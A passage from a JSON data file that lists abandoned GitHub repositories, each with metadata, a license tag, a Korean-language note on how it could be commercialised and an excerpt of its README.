[ptb2.me/flexgrid](http://ptb2.me/flexgrid/)\n- [codepen.io/marcolago/pen","composite_score":0.3442,"license_safety_tag":"unknown"},{"name":"wequick/Small","github_url":"https://github.com/wequick/Small","stars":7,"language":"Java","license":"apache-2.0","abandonment_months":33,"description":"# Small (wequick/Small) 분석\n\n## 왜 보물인가\n작고 간단한 앱을 빠르게 만들 수 있게 도와주는 도구로, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 회사들이 자신의 비즈니스 아이디어를 빠르게 앱으로 만들어 테스트할 수 있는 플랫폼으로 판매\n2. **내부 업무 도구**: 기업의 ","readme_excerpt":"![small-header][header]\n\n世界那么大，组件那么小。Small，做最轻巧的跨平台插件化框架。\n\n[Android](Android) API 9(2.3)+  [iOS](iOS) 7.0+\n\n[![CI Status](http://img.shields.io/travis/wequick/Small.svg?style=flat)](https://travis-ci.org/wequick/Small)\n[![License Apache2.0](https://img.shields.io/hexpm/l/plug.svg)][license]\n\n官网：http://code.wequick.net/Small\n\n## 架构\n\n![small-arch][arch]\n\n## 快照\n\n![small-snapshot][snapshot]\n\n## 入门\n\n* [Android](Android)\n* [iOS](iOS)\n\n## 进阶\n\n* [原理介绍][wiki]\n* [贡献指南][CG]\n* [加入开发][CLA]\n\n![small-footer][footer]\n\n[header]: http://code.wequick.net/assets/images/small-header.png\n[footer]: http://code.wequick.net/assets/images/small-footer.png\n[arch]: http://code.wequick.net/assets/images/small-architecture.png\n[snapshot]: http://code.wequick.net/assets/anims/small-upgrade.gif\n[license]: https://raw.githubusercontent.com/wequick/Small/master/LICENSE\n[wiki]: https://github.com/wequick/Small/wiki\n[android-tour]: https://github.com/wequick/Small/tree/master/Android\n[iOS-tour]: https://github.com/wequic","composite_score":0.3442,"license_safety_tag":"safe"},{"name":"Tencent/nohost","github_url":"https://github.com/Tencent/nohost","stars":6,"language":"JavaScript","license":"NOASSERTION","abandonment_months":17,"description":"# Tencent/nohost 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱을 만들 때 필요한 테스트 서버를 자동으로 구성해주는 도구로, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 개발 플랫폼에서 고객이 즉시 테스트 환경을 생성할 수 있는 기능으로 통합\n2. **내부 업무 도구**: 대기업의 개발팀이","readme_excerpt":"# Nohost\n[![NPM version](https://img.shields.io/npm/v/@nohost/server.svg?style=flat-square)](https://npmjs.org/package/@nohost/server)\n[![node version](https://img.shields.io/badge/node.js-%3E=_8.0.0-green.svg?style=flat-square)](http://nodejs.org/download/)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square)](https://github.com/Tencent/nohost/pulls)\n[![License](https://img.shields.io/npm/l/@nohost/server.svg?style=flat-square)](https://www.npmjs.com/package/@nohost/server)\n\nNohost 是基于 [Whistle](https://github.com/avwo/whistle) 实现的多用户多环境配置及抓包调试系统，不仅具备 Whistle 的所有功能，并在 Whistle 基础上扩展了一些功能，且支持多人多环境同时使用，主要用于部署在公共服务器上供整个部门（公司）的同事共同使用，具有以下功能：\n1. 环境共享：前端无需配后台环境，后台无需配前端环境，其他人无需配任何环境\n2. 抓包调试：远程实时抓包调试，支持各种 Whistle 规则，以及通过链接分享抓包数据\n3. 历史记录：可以把环境配置及抓包数据沉淀下来，供后续随时切换查看\n4. 插件扩展：可以通过插件扩展实现诸如 [inspect](https://github.com/whistle-plugins/whistle.inspect)，[vase](https://github.com/whistle-plugins/whistle.vase)，[autosave](https://github.com/whistle-plugins/whistle.au","composite_score":0.3438,"license_safety_tag":"unknown"},{"name":"robaho/fixed","github_url":"https://github.com/robaho/fixed","stars":12,"language":"Go","license":"MIT","abandonment_months":6,"description":"# robaho/fixed 프로젝트 분석\n\n## 왜 보물인가\n복잡한 수학 계산을 정확하게 처리하는 기술로, 금융·회계·과학 분야에서 반올림 오류로 인한 손실을 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **회계 SaaS**: 소규모 세무법인이 월 구독형 자동 회계 정산 서비스로 판매\n2. **금융 API**: 암호화폐 거래소나 송금 서비스의 정확","readme_excerpt":"**Summary**\n\nA fixed place numeric library designed for performance.\n\nThe C++ version is available [here](https://github.com/robaho/cpp_fixed).\n\nAll numbers have a fixed 7 decimal places (18 digits total), and the maximum permitted value is +- 99999999999,\nor just under 100 billion. NaN is supported.\n\nThe library is safe for concurrent use. Fixed values are immutable. It has built-in support for binary and json marshalling.\n\nIt is ideally suited for high performance trading financial systems. All common math operations are completed with 0 allocs.\n\n**Design Goals**\n\nPrimarily developed to improve performance in [go-trader](https://github.com/robaho/go-trader).\nUsing Fixed rather than decimal.Decimal improves the performance by over 20%, and a lot less GC activity as well.\nYou can review these changes under the 'fixed' branch.\n\nIf you review the go-trader code, you will quickly see that I use dot imports for the fixed and common packages. Since this\nis a \"business/user\" app and not syst","composite_score":0.3436,"license_safety_tag":"safe"},{"name":"tkarras/progressive_growing_of_gans","github_url":"https://github.com/tkarras/progressive_growing_of_gans","stars":6,"language":"Python","license":"NOASSERTION","abandonment_months":52,"description":"# Progressive Growing of GANs 상업화 분석\n\n## 왜 보물인가\n낮은 해상도에서 시작해 점진적으로 고품질 이미지를 생성하는 AI 기술로, 사진 같은 얼굴이나 제품 이미지를 빠르고 저렴하게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. AI 프로필 사진 생성 SaaS**\n- 이력서나 SNS용 프로필 사진을 몇 초 만에 자동 생","readme_excerpt":"## Progressive Growing of GANs for Improved Quality, Stability, and Variation<br><i>&mdash; Official TensorFlow implementation of the ICLR 2018 paper</i>\n\n**Tero Karras** (NVIDIA), **Timo Aila** (NVIDIA), **Samuli Laine** (NVIDIA), **Jaakko Lehtinen** (NVIDIA and Aalto University)\n\n* For business inquiries, please contact **[researchinquiries@nvidia.com](mailto:researchinquiries@nvidia.com)**\n* For press and other inquiries, please contact Hector Marinez at **[hmarinez@nvidia.com](mailto:hmarinez@nvidia.com)**\n\n![Representative image](https://raw.githubusercontent.com/tkarras/progressive_growing_of_gans/master/representative_image_512x256.png)<br>\n**Picture:** Two imaginary celebrities that were dreamed up by a random number generator.\n\n**Abstract:**<br>\n*We describe a new training methodology for generative adversarial networks. The key idea is to grow both the generator and discriminator progressively: starting from a low resolution, we add new layers that model increasingly fine det","composite_score":0.3436,"license_safety_tag":"unknown"},{"name":"CharlesShang/FastMaskRCNN","github_url":"https://github.com/CharlesShang/FastMaskRCNN","stars":7,"language":"Python","license":"apache-2.0","abandonment_months":66,"description":"# FastMaskRCNN 저장소 분석\n\n## 왜 보물인가\n사진이나 영상에서 물체를 자동으로 찾아내고 윤곽을 그려주는 기술로, 보안 카메라, 자동운전, 의료 영상 분석 등에 광범위하게 쓸 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **CCTV 모니터링 SaaS**: 보안회사가 구독형 서비스로 제공하여 불법 침입자나 이상 상황을 자동 감지\n2. **의료기","readme_excerpt":"# Mask RCNN\nMask RCNN in TensorFlow\n\nThis repo attempts to reproduce this amazing work by Kaiming He et al. : \n[Mask R-CNN](https://arxiv.org/abs/1703.06870)\n\n## Requirements\n\n- [Tensorflow (>= 1.0.0)](https://www.tensorflow.org/install/install_linux)\n- [Numpy](https://github.com/numpy/numpy/blob/master/INSTALL.rst.txt)\n- [COCO dataset](http://mscoco.org/dataset/#download)\n- [Resnet50](http://download.tensorflow.org/models/resnet_v1_50_2016_08_28.tar.gz)\n\n## How-to\n1. Go to `./libs/datasets/pycocotools` and run `make`\n2. Download [COCO](http://mscoco.org/dataset/#download) dataset, place it into `./data`, then run `python download_and_convert_data.py` to build tf-records. It takes a while.\n3. Download pretrained resnet50 model, `wget http://download.tensorflow.org/models/resnet_v1_50_2016_08_28.tar.gz`, unzip it, place it into `./data/pretrained_models/`\n4. Go to `./libs` and run `make`\n5. run `python train/train.py` for training\n6. There are certainly some bugs, please report them bac","composite_score":0.3435,"license_safety_tag":"safe"},{"name":"WenchaoD/FSCalendar","github_url":"https://github.com/WenchaoD/FSCalendar","stars":11,"language":"Objective-C","license":"mit","abandonment_months":22,"description":"# FSCalendar 저장소 분석\n\n## 왜 보물인가\n스마트폰 앱에서 달력 기능을 쉽게 만들 수 있는 도구로, 개발자들이 반복적인 작업 없이 전문적인 달력을 빠르게 구현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 일정 관리 서비스**: 중소 회사들이 팀 일정을 공유하는 웹/앱 서비스에 내장하여 구독료 수익화\n2. **내부 업무 도구**:","readme_excerpt":"\n![logo](https://cloud.githubusercontent.com/assets/5186464/16540124/efc51f72-408b-11e6-934a-4e750b8b55bb.png)\n<br/><br/>\n[![Apps Using](https://img.shields.io/badge/Apps%20Using-%3E%2010,000-00BFFF.svg?style=plastic)](https://cocoapods.org/pods/FSCalendar)\n[![Total Downloads](https://img.shields.io/badge/Total%20Downloads-%3E%20500,000-00BFFF.svg?style=plastic)](https://cocoapods.org/pods/FSCalendar)\n<br>\n[![Travis](https://travis-ci.org/WenchaoD/FSCalendar.svg?branch=master)](https://travis-ci.org/WenchaoD/FSCalendar)\n[![Version](https://img.shields.io/cocoapods/v/FSCalendar.svg?style=flat)](http://cocoadocs.org/docsets/FSCalendar)\n[![Platform](https://img.shields.io/badge/platform-iOS%207%2B-blue.svg?style=flat)](http://cocoadocs.org/docsets/FSCalendar)\n[![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n[![SwiftPM](https://img.shields.io/badge/SPM-supported-DE5C43.svg?style=flat)](https://swift.org/p","composite_score":0.3435,"license_safety_tag":"safe"},{"name":"octra-labs/ocs01-test","github_url":"https://github.com/octra-labs/ocs01-test","stars":191,"language":"Rust","license":"MIT","abandonment_months":10,"description":"","readme_excerpt":"","composite_score":0.3435,"license_safety_tag":"safe"},{"name":"shuhuai007/Machine-Learning-Session","github_url":"https://github.com/shuhuai007/Machine-Learning-Session","stars":6,"language":"","license":"unknown","abandonment_months":74,"description":"# Machine-Learning-Session 저장소 분석\n\n## 왜 보물인가\n기계학습의 기초 개념을 단계별로 학습할 수 있도록 정리한 교육용 자료로, AI 기술을 배우고 싶은 초보자들에게 실용적인 입문서 역할을 합니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼**: 기초 머신러닝 강좌용 커리큘럼으로 패키징하여 구독형 교육 서비스로 제공\n","readme_excerpt":"## 在B站上传了一系列关于机器学习的视频，每个部分均是一些比较基础的入门推导，目的是帮助起步，起到抛砖引玉的作用\n\n## 视频次序\n#### [机器学习-白板推导系列-开篇](https://www.bilibili.com/video/av31950221/)\n#### [机器学习-白板推导系列-数学基础](https://www.bilibili.com/video/av32905863/)\n#### [机器学习-白板推导系列-线性回归(Linear Regression)](https://www.bilibili.com/video/av31989606/)\n#### [机器学习-白板推导系列-线性分类(Linear Classification)](https://www.bilibili.com/video/av33101528/)\n#### [机器学习-白板推导系列-降维](https://www.bilibili.com/video/av32709936/)\n#### [机器学习-白板推导系列-支持向量机(SVM)](https://www.bilibili.com/video/av28186618/)\n#### [机器学习-白板推导系列-核方法(Kernel Method)](https://www.bilibili.com/video/av34731384/)\n#### [机器学习-白板推导系列-指数族分布](https://www.bilibili.com/video/av33360526/)\n#### [机器学习-白板推导系列-概率图模型](https://www.bilibili.com/video/av33545406/)\n#### [机器学习-白板推导系列-EM算法](https://www.bilibili.com/video/av31906558/)\n#### [机器学习-白板推导系列-高斯混合模型(GMM)](https://www.bilibili.com/video/av35183585/)\n#### [机器学习-白板推导系列-变分推断(Variational Inference)](https://www.bilibili.com/video/av32047507/)\n#### [机器学习-白板推导系列-MCMC](htt","composite_score":0.3434,"license_safety_tag":"unknown"},{"name":"vivirenremoto/doomcaptcha","github_url":"https://github.com/vivirenremoto/doomcaptcha","stars":7,"language":"HTML","license":"GPL-3.0","abandonment_months":17,"description":"# DoomCaptcha 사업화 분석\n\n## 왜 보물인가\n웹사이트와 앱에서 봇(자동 프로그램)을 막는 보안 기술을 직접 만들 수 있는 도구라서, 자신의 서비스를 보호하거나 이를 다른 회사에 팔 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **회원가입 봇 방지 SaaS**: 온라인 쇼핑몰이나 게임사의 자동 가입 악용을 막는 서비스로 월 구독 판매\n2. **","readme_excerpt":"# DOOM Captcha\n\n[DEMO](https://vivirenremoto.github.io/doomcaptcha/)\n\n[Author](https://twitter.com/vivirenremoto)\n\n![DOOM Captcha](https://vivirenremoto.github.io/doomcaptcha/static/social.jpg)\n\n# Update 2025\n\nCheckout the new interpretation of DOOM Captcha made by Guillermo Rauch [https://doom-captcha.vercel.app/](https://doom-captcha.vercel.app/)\n","composite_score":0.3433,"license_safety_tag":"restricted"},{"name":"chrisjenx/Calligraphy","github_url":"https://github.com/chrisjenx/Calligraphy","stars":6,"language":"Java","license":"apache-2.0","abandonment_months":25,"description":"# Calligraphy 저장소 분석\n\n## 왜 보물인가\n앱 화면에 아름다운 글씨체를 쉽게 입혀주는 기술로, 사용자가 느끼는 앱의 품질감을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 디자인 협업 도구나 문서 편집 앱에서 사용자가 다양한 글씨체로 텍스트를 꾸밀 수 있도록 제공\n- **내부 업무 도구**: 기업 브랜드 글씨","readme_excerpt":"# This version of Calligraphy has reached its end-of-life and is no longer maintained. Please migrate to [Calligraphy 3](https://github.com/InflationX/Calligraphy)!\n\nCalligraphy\n===========\n\n[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-Calligraphy-blue.svg?style=flat)](http://android-arsenal.com/details/1/163)\n\nCustom fonts in Android an OK way.\n\nAre you fed up of Custom Views to set fonts? Or traversing the ViewTree to find TextViews? Yeah me too.\n\n![alt text](https://github.com/chrisjenx/Calligraphy/raw/master/screenshot.png \"ScreenShot Of Font Samples\")\n\n## Getting started\n\n### Dependency\n\nInclude the dependency [Download (.aar)](http://search.maven.org/remotecontent?filepath=uk/co/chrisjenx/calligraphy/2.3.0/calligraphy-2.3.0.aar) :\n\n```groovy\ndependencies {\n    compile 'uk.co.chrisjenx:calligraphy:2.3.0'\n}\n```\n### Add Fonts\n\nAdd your custom fonts to `assets/`. All font definitions are relative to this path.\n\nAssuming that you are using Gradle you should creat","composite_score":0.3432,"license_safety_tag":"safe"},{"name":"Kreijstal/ponytown","github_url":"https://github.com/Kreijstal/ponytown","stars":11,"language":"JavaScript","license":"MIT","abandonment_months":12,"description":"# Kreijstal/ponytown 분석\n\n## 왜 보물인가\n온라인에서 여럿이 함께 즐길 수 있는 작은 게임 세계를 직접 만들고 운영할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 커뮤니티가 자신의 가상 공간을 구축·운영하게 하는 월 구독형 플랫폼\n2. **내부 업무 도구**: 회사 직원들이 온라인으로 모여 협업하고 소통","readme_excerpt":"\n       / _ \\___  _ __  _   /__   \\_____      ___ __\n      / /_)/ _ \\| '_ \\| | | |/ /\\/ _ \\ \\ /\\ / / '_ \\\n     / ___/ (_) | | | | |_| / / | (_) \\ V  V /| | | |\n     \\/    \\___/|_| |_|\\__, \\/   \\___/ \\_/\\_/ |_| |_|\n                       |___/\n\n\nWelcome To PonyTown, server.\nThis was a Reverse Engineered version of the Reverse Engineered version of the Official server, except this time, code might come out Public.\n\n## Running the server\n\n1) Use node.js to start the server, the main File is called `app.js`\n\n    $ node app.js\n\nTable of Contents\n-----------------\n\n- [Features](#features)\n- [FAQ](#faq)\n- [How It Works](#how-it-works-mini-guides)\n\n\n\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR ","composite_score":0.3431,"license_safety_tag":"safe"},{"name":"akinsho/bufferline.nvim","github_url":"https://github.com/akinsho/bufferline.nvim","stars":7,"language":"Lua","license":"GPL-3.0","abandonment_months":17,"description":"# bufferline.nvim 분석 보고서\n\n## 왜 보물인가\n프로그래머들이 매일 사용하는 코드 편집기에서 여러 파일을 더 편하게 관리할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 개발자 생산성 SaaS**\n- 코드 편집기 플러그인 마켓플레이스에서 유료 버전으로 판매\n- 팀 협업 기능이 추가된 엔터프라이즈 버전 제공\n\n**2. 프로그래밍 ","readme_excerpt":"[![CI](https://github.com/akinsho/bufferline.nvim/actions/workflows/ci.yaml/badge.svg)](https://github.com/akinsho/bufferline.nvim/actions/workflows/ci.yaml)\n\n<h1 align=\"center\">\n  bufferline.nvim\n</h1>\n\n<p align=\"center\">A <i>snazzy</i> 💅 buffer line (with tabpage integration) for Neovim built using <b>lua</b>.</p>\n\n![Demo GIF](https://user-images.githubusercontent.com/22454918/111992693-9c6a9b00-8b0d-11eb-8c39-19db58583061.gif)\n\n<!--toc:start-->\n\n- [Requirements](#requirements)\n- [Installation](#installation)\n- [Usage](#usage)\n- [Configuration](#configuration)\n- [Features](#features)\n  - [Alternate styling](#alternate-styling)\n  - [Hover events](#hover-events)\n  - [Underline indicator](#underline-indicator)\n  - [Tabpages](#tabpages)\n  - [LSP indicators](#lsp-indicators)\n  - [Groups](#groups)\n  - [Sidebar offsets](#sidebar-offsets)\n  - [Numbers](#numbers)\n  - [Picking](#picking)\n  - [Pinning](#pinning)\n  - [Unique names](#unique-names)\n  - [Close icons](#close-icons)\n  - [Re-ordering]","composite_score":0.3431,"license_safety_tag":"restricted"},{"name":"liuzhuang13/DenseNet","github_url":"https://github.com/liuzhuang13/DenseNet","stars":5,"language":"Lua","license":"bsd-3-clause","abandonment_months":29,"description":"# DenseNet 저장소 분석\n\n## 왜 보물인가\n사진이나 이미지를 자동으로 분석하고 분류하는 인공지능 기술로, 의료 진단, 물품 검색, 보안 시스템 등 실제 비즈니스에 바로 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **의료 SaaS**: 의사들이 X선 사진을 업로드하면 자동으로 질병 징후를 감지해주는 구독형 진단 보조 서비스\n2. **전자상","readme_excerpt":"# Densely Connected Convolutional Networks (DenseNets)\n\nThis repository contains the code for DenseNet introduced in the following paper \n\n[Densely Connected Convolutional Networks](http://arxiv.org/abs/1608.06993) (CVPR 2017, Best Paper Award) \n\n[Gao Huang](http://www.cs.cornell.edu/~gaohuang/)\\*, [Zhuang Liu](https://liuzhuang13.github.io/)\\*, [Laurens van der Maaten](https://lvdmaaten.github.io/) and [Kilian Weinberger](https://www.cs.cornell.edu/~kilian/) (\\* Authors contributed equally).\n\n\n**Now with much more memory efficient implementation!** Please check the [technical report](https://arxiv.org/pdf/1707.06990.pdf) and [code](https://github.com/liuzhuang13/DenseNet/tree/master/models) for more infomation.\n \nThe code is built on [fb.resnet.torch](https://github.com/facebook/fb.resnet.torch).\n\n### Citation\nIf you find DenseNet useful in your research, please consider citing:\n\n\t@inproceedings{DenseNet2017,\n\t  title={Densely connected convolutional networks},\n\t  author={Huang, Gao a","composite_score":0.3429,"license_safety_tag":"safe"},{"name":"zeit/pkg","github_url":"https://github.com/zeit/pkg","stars":12,"language":"JavaScript","license":"mit","abandonment_months":29,"description":"# zeit/pkg 분석 보고서\n\n## 왜 보물인가\n프로그램을 실행 파일로 변환해주는 도구로, 개발자들이 복잡한 기술 없이 자신의 프로그램을 일반인도 쉽게 사용할 수 있는 형태로 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 데이터 분석 도구를 독립적인 데스크톱 프로그램으로도 제공하여 인터넷 없이 사용 가능하게 ","readme_excerpt":"# `pkg`\n\n> [!IMPORTANT]  \n> `pkg` has been deprecated with `5.8.1` as the last release. There are a number of successful forked versions of `pkg` already with various feature additions. Further, we’re excited about Node.js 21’s support for [single executable applications](https://nodejs.org/api/single-executable-applications.html). Thank you for the support and contributions over the years. The repository will remain open and archived.\n\nThis command line interface enables you to package your Node.js project into an executable that can be run even on devices without Node.js installed.\n\n## Use Cases\n\n- Make a commercial version of your application without sources\n- Make a demo/evaluation/trial version of your app without sources\n- Instantly make executables for other platforms (cross-compilation)\n- Make some kind of self-extracting archive or installer\n- No need to install Node.js and npm to run the packaged application\n- No need to download hundreds of files via `npm install` to deploy\n","composite_score":0.3428,"license_safety_tag":"safe"},{"name":"weaveworks/flux","github_url":"https://github.com/weaveworks/flux","stars":5,"language":"Go","license":"apache-2.0","abandonment_months":43,"description":"# Flux 저장소 분석\n\n## 왜 보물인가\n복잡한 소프트웨어 배포를 자동으로 관리해주는 업계 표준 도구로, 대규모 기술 회사들이 신뢰하고 사용합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객사의 클라우드 환경에 소프트웨어를 자동으로 배포·업데이트하는 관리형 서비스\n2. **내부 업무 도구**: 기업이 자체 서버에서 여러 애플리케이션을","readme_excerpt":"# Flux v1\n\nThis repository contains the source code of Flux Legacy (v1).\n\nFlux v1 has reached **end of life** and has been replaced by [fluxcd/flux2](https://github.com/fluxcd/flux2)\nand its controllers entirely.\n\nIf you consider using Flux, please take a look at <https://fluxcd.io/flux/get-started>\nto get started with v2.\n\nIf you are on Flux Legacy, please follow the [migration guide](https://fluxcd.io/flux/migration).\nIf you need hands-on help migrating, you can contact one of the companies\n[listed here](https://fluxcd.io/support/#my-employer-needs-additional-help).\n\n## History\n\nFlux was initially developed by [Weaveworks](https://weave.works) and made open source in 2016.\nOver the years the community around Flux & GitOps grew and in 2019 Weaveworks decided to donate\nthe project to [CNCF](https://cncf.io).\n\nAfter joining CNCF, the Flux project has seen [massive adoption](https://fluxcd.io/adopters/)\nby various organisations. With adoption came a wave of feature requests\nthat required","composite_score":0.3427,"license_safety_tag":"safe"},{"name":"MortimerGoro/MGSwipeTableCell","github_url":"https://github.com/MortimerGoro/MGSwipeTableCell","stars":6,"language":"Objective-C","license":"mit","abandonment_months":39,"description":"# MGSwipeTableCell 분석 보고서\n\n## 왜 보물인가\n스마트폰 앱에서 목록 항목을 옆으로 밀어서 삭제·편집할 수 있게 해주는 핵심 기술로, iOS 앱 개발에 필수적인 사용자 경험 요소입니다.\n\n## 어디에 쓸 수 있나\n1. **할 일 관리 SaaS**: 투두 앱에서 항목을 밀어서 삭제하는 기능 제공\n2. **메일 관리 API**: 메일 앱 개발","readme_excerpt":"MGSwipeTableCell\n================\n\n[![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n\nMGSwipeTableCell is an easy to use UITableViewCell subclass that allows to display swipeable buttons with a variety of transitions.\n\nThis library is compatible with all the different ways to create a UITableViewCell: system predefined styles, programmatically created cells, cells loaded from a xib and prototype cells within a storyboard. You can use autolayout if you want.\n\nWorks on iOS >= 5.0. Tested on all iOS versions on iPhone and iPad: iOS 7, iOS 8, iOS 9, iOS 10, iOS 11, iOS 12, iOS 13, iOS 14.\n\n## Transitions demo\n\n### Border transition\n\n<p align=\"center\"><img src=\"https://raw.githubusercontent.com/MortimerGoro/MGSwipeTableCell/master/readme-assets/border.gif\" /></p>\n\n### Clip transition\n\n<p align=\"center\"><img src=\"https://raw.githubusercontent.com/MortimerGoro/MGSwipeTableCell/master/readme-assets/clip.gif\" /","composite_score":0.3427,"license_safety_tag":"safe"},{"name":"segmentio/nightmare","github_url":"https://github.com/segmentio/nightmare","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":26,"description":"# Nightmare 저장소 분석\n\n## 왜 보물인가\n웹사이트를 자동으로 조작하고 정보를 수집하는 작업을 코드로 간단히 처리할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **웹 모니터링 SaaS**: 경쟁사 가격 변동, 상품 재입고 알림 등을 자동으로 감시하는 구독형 서비스\n2. **마케팅 자동화 도구**: SNS 게시물, 뉴스 기사 등 웹에서 ","readme_excerpt":"*NOTICE: This library is no longer maintained.*\n\n[![Build Status](https://img.shields.io/circleci/project/segmentio/nightmare/master.svg)](https://circleci.com/gh/segmentio/nightmare)\n[![Join the chat at https://gitter.im/rosshinkley/nightmare](https://badges.gitter.im/rosshinkley/nightmare.svg)](https://gitter.im/rosshinkley/nightmare?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n# Nightmare\n\nNightmare is a high-level browser automation library from [Segment](https://segment.com).\n\nThe goal is to expose a few simple methods that mimic user actions (like `goto`, `type` and `click`), with an API that feels synchronous for each block of scripting, rather than deeply nested callbacks. It was originally designed for automating tasks across sites that don't have APIs, but is most often used for UI testing and crawling.\n\nUnder the covers it uses [Electron](http://electron.atom.io/), which is similar to [PhantomJS](http://phantomjs.org/) but roughly [twice as fas","composite_score":0.3427,"license_safety_tag":"unknown"},{"name":"amfe/article","github_url":"https://github.com/amfe/article","stars":6,"language":"","license":"unknown","abandonment_months":124,"description":"# amfe/article 저장소 분석\n\n## 왜 보물인가\n웹 콘텐츠를 자동으로 정리하고 관리할 수 있는 기술로, 뉴스나 블로그 같은 글 모음 서비스를 만드는 데 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **뉴스 큐레이션 SaaS**: 여러 신문사 기사를 자동으로 모아서 사용자에게 보여주는 구독 서비스\n- **기업 내부 정보 도구**: 회사 직원","readme_excerpt":"# 2015年\n\n- [阿里无线前端性能优化指南 (Pt.1 加载期优化)](https://github.com/amfe/article/issues/1) by [@晓田](https://github.com/tancy)\n- [Web中的图标](https://github.com/amfe/article/issues/2) by [@大漠](https://github.com/airen)\n- [我理解的阿里无线前端“架构”（半鸡汤，少干货）](https://github.com/amfe/article/issues/3) by [@hongru](https://github.com/hongru)\n- [写给前端面试者](https://github.com/amfe/article/issues/5) by [@大漠](https://github.com/airen)\n- [手机淘宝这三年（更新PPT同步录音视频）](https://github.com/amfe/article/issues/7) by [@渚薰](https://github.com/terrykingcha)\n- [手机淘宝前端的图片相关工作流程梳理](https://github.com/amfe/article/issues/8) by [@勾三股四](https://github.com/Jinjiang)\n- [高级CSS filters](https://github.com/amfe/article/issues/9) by [@大漠](https://github.com/airen)\n- [Font Boosting](https://github.com/amfe/article/issues/10) by [@尚左](https://github.com/mingelz)\n- [15年双11手淘前端技术巡演 - 前言](https://github.com/amfe/article/issues/11) by [@hongru](https://github.com/hongru)\n- [对无线电商动态化方案的思考（一）](https://github.com/amfe/article/issues/13) by [@勾三股四](https://","composite_score":0.3421,"license_safety_tag":"unknown"},{"name":"jfoenixadmin/JFoenix","github_url":"https://github.com/jfoenixadmin/JFoenix","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":35,"description":"# JFoenix 저장소 분석\n\n## 왜 보물인가\nJavaFX 애플리케이션을 더 예쁘고 사용하기 편하게 만들어주는 디자인 도구 모음으로, 기업용 관리 시스템이나 데스크톱 프로그램을 만드는 개발자들에게 필수 자산입니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업 관리 도구 SaaS**: 사내 직원 관리, 매출 관리, 인사 시스템 등을 운영하는 회사들이 직원용","readme_excerpt":"[![HitCount](https://hits.dwyl.com/sshahine/JFoenix.svg?style=flat)](https://hits.dwyl.com/jfoenixadmin/JFoenix)\n[![][CircleCI img]][CircleCI]\n[![][mavenbadge img]][mavenbadge]\n[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=jfoenixadmin_JFoenix&metric=alert_status)](https://sonarcloud.io/dashboard?id=jfoenixadmin_JFoenix)\n[![][gitter img]][gitter]\n[![Backers on Open Collective](https://opencollective.com/JFoenix/backers/badge.svg)](#backers) \n[![GitHub forks](https://img.shields.io/github/forks/jfoenixadmin/JFoenix.svg)](https://github.com/jfoenixadmin/JFoenix/network)\n[![GitHub issues](https://img.shields.io/github/issues/jfoenixadmin/JFoenix.svg)](https://github.com/jfoenixadmin/JFoenix/issues)\n[![GitHub license](https://img.shields.io/github/license/jfoenixadmin/JFoenix.svg)](https://github.com/jfoenixadmin/JFoenix/blob/master/LICENSE)\n---\n\n<h1 align=\"center\">\n    <img src=\"http://www.jfoenix.com/img/logo-JFX.png\">\n</h1>\n<p align=\"center\">\n<sup>\n<b>","composite_score":0.342,"license_safety_tag":"safe"},{"name":"ogiansouza/ebac_exercicio_rtl","github_url":"https://github.com/ogiansouza/ebac_exercicio_rtl","stars":16,"language":"TypeScript","license":"NOASSERTION","abandonment_months":25,"description":"","readme_excerpt":"","composite_score":0.342,"license_safety_tag":"unknown"},{"name":"Disassembler0/Win10-Initial-Setup-Script","github_url":"https://github.com/Disassembler0/Win10-Initial-Setup-Script","stars":5,"language":"PowerShell","license":"mit","abandonment_months":61,"description":"# Win10-Initial-Setup-Script 분석\n\n## 왜 보물인가\nWindows 10을 깔끔하게 처음부터 설정해주는 자동화 도구로, 일반인도 복잡한 설정 없이 깔끔한 윈도우를 바로 쓸 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업용 PC 설정 서비스**: 대량의 직원 컴퓨터를 한 번에 초기화하는 SaaS 플랫폼\n2. **PC 판매점 내부","readme_excerpt":"## The project is archived\r\n\r\nThis project has been archived because I no longer use Windows. I grew tired with the system being unable to keep itself configured in the desired state, group policies randomly stopping working for hundreds of managed workstations at once, advertisements, unwanted tips and content popping up on various places throughout the user interface, and incompetent support even for enterprise products. Ultimately I have migrated virtually all my servers, workstations and laptops to linux. Even though there are areas where the open 